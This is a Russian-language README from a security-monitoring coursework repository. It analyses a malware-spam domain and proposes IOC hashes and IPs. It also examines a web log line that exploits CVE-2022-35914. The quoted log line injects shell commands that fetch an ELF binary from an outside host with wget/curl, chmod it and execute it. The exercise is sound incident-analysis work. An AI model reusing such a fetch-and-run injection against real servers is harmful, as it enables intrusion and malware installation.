marker/sf
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
bad
sf/01-main/02-monitoring/01-intro
History
Marat Kharitonov 40899bcd4b refactored. 01-02-03 done
2024-03-26 19:36:57 -04:00
..
README.md
refactored. 01-02-03 done
2024-03-26 19:36:57 -04:00

README.md

Задание 1

Согласно найденным отчётам по хостнейму и IP-адресу:

https://any.run/report/6dd737167202586feffdf37f3883461de94a1c01051a32b30db66fc1db5a681d/11691868-8155-4601-9cc5-ebdd94a77b79 https://otx.alienvault.com/indicator/ip/103.53.42.223

Данный домен скорее всего участвовал в рассылке вредоносных файлов.

  1. В список IOC можно предложить указать хэши вредоносных файлов, связанных с данным доменом, например:
bae8ebd43fe0bc8c5bce6d5b8986589434e434b9a0023c7f535e6269858e4d7d
6DD737167202586FEFFDF37F3883461DE94A1C01051A32B30DB66FC1DB5A681D
fde3341015c7de7383bca14b2e62336bd685f1abc4105ad5d4eba6d13da09f15
65f81879b5421a5683de158629677f153d046ce7dc81fb770d3b2ca9cbd8d47f
17d1bbe4053498d4a7db1eda9e477d7d86b1b538afa4b9a9f7579676459c17c4
b963fdcb37b1ea21efd4d930112e3e7636d16160699eaa09d4e1e23a2f12f00a

Также можно добавить IP-адрес данного домена, так как взломан может целый почтовый сервис, который хостит множество почтовых доменов (103.53.42.223)

Дополнительно, можно предположить, что сайт хостится на сервисе (*.webhostbox.net), все поддомены можно также добавить в список IOC.

  1. Сам хост по совокупности не похож на зараженный в привычном понимании (родительский домен в каких-либо базах вредоносов не находится), вероятнее всего был взломан почтовый сервер и хоста (в отчетах имеются даже учетные данные, с помощью которых проводилась рассылка), после чего он использовался для спам рассылок вредоносных файлов (значатся различные семейства Trojan и шифровальщиков, например AgentTesla, ZeuS) с других уже зараженных машин.

Задание 2

Самым важным моментом логов можно считать следующую запись:

47.243.78.78 - - [21/Oct/2022:00:33:56 +0300] "GET /vendor/htmlawed/htmlawed/233.php?123456=rm%20-f%20linux*;wget%20http://67.198.237.116/linux_x86;curl%20-O%20http://67.198.237.116/linux_x86;chmod%20777%20*;./linux_x86;rm%20-f%20linux_x86.*;rm%20-f%20md*;rm%20-f%20x* HTTP/1.1" 200 5800 "-" "python-requests/2.27.1"

Это запрос с User-agent "python-requests/2.27.1" возвративший 200 ответ. User-agent python-requests говорит о том, что данный запрос вероятно создан с помощью библиотеки Python. А 200 ответ говорит, что сервер вернул некое содержимое и отработал запрос. А куча bash-команд в запросе говорит нам о вероятной эксплуатации атаки типа PHP-Injection (https://owasp.org/www-community/attacks/Code_Injection)

  1. ELF-файл скорее всего скачивается с помощью wget с хоста http://67.198.237.116, после чего происходит выдача ему привилегий (chmod) и запуск (./linux_x86)

Имя elf-файла -- linux_x86.

  1. Вероятнее всего с активностью ассоциируется уязвимость CVE-2022-35914 (https://nvd.nist.gov/vuln/detail/CVE-2022-35914). Понять это можно по пути до скрипта в запросе (/vendor/htmlawed/htmlawed/233.php), при этом в уязвимости описывается эксплуатация через POST-запрос и другое имя уязвимого скрипта, так что можно предположить, что 233.php уже является PHP-шеллом, загруженным на уязвимый сервер в результате эксплуатации.

Итоговый ответ (по форме: имя ELF-файла (слитно), CVE-идентификатор уязвимости (слитно)): linux_x86, CVE-2022-35914